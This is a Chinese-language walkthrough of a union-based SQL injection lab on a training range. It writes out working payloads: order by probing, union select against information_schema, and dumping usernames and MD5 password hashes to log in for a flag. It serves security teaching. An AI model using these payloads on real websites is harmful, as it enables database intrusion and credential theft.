0x01 基本步骤/思路
a.寻找/判断注入点? 该环境注入点在id的值处
b.猜解列名数量(字段数) order by x? 该环境字段数为4
c.信息收集,收集数据库名、表名、列名等
d.获取数据
0x02 操作演示
1.启动靶场环境
2.下方通知栏,点击进入寻找注入点
找到疑似注入点id=1
3.测试注入点
?http://219.153.49.228:42178/new_list.php?id=1 and 1 = 2
使用and1=2测试语句,发现并没有报错,说明该处有注入点,也可以使用id=任意值来进行访问,
接下来进行字段数猜测:使用语句order by x(x为手工测试值,从小到大,直到页面加载)
通过order by 语句 测试出该靶场字段数为4
ps:由于SQL语法规则,所以必须要进行字段数猜测(union联合查询前后字段数必须保持一致)
4.报错
注入语句:
在id=-1后拼接 union select 1,2,3,4? 使之报错,得到以下页面
5.信息收集
a.寻找库名
之前页面返回的值为2,3,则可以在2,3上使用如下语句进行注入:
在id=-1后拼接 union select 1,database(),user(),4
得到数据库名为:mozhe_Discuz_StormGroup
用户为:root@localhost
b.从指定数据库mozhe_Discuz_StormGroup获取表名
在 id=-1?后拼接 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
得到表名StormGroup_member 
?c.从指定表StormGroup_member 获取列名
在id=-1后拼接 union select 1,group_concat(column_name),3,4 from information_schema.columns?where table_name='StormGroup_member’
得到列名id,name,password,status
?d.从列名获取数据
在id=-1后拼接 union select 1,name,password,4 from?StormGroup_member limit 1,1
ps:如果此处不加limit1,1 将会得到另一个MD5值
得到MD5值,MD5值解密即可得到登录密码
6.返回后台登录界面,登录即可得到KEY
?0x03:涉及SQL语句
information_schema.tables:记录所有表名信息的表
information_schema.columns:记录所有列名信息的表
table_schema: 数据库名
table_name: 表名?
column_name:列名?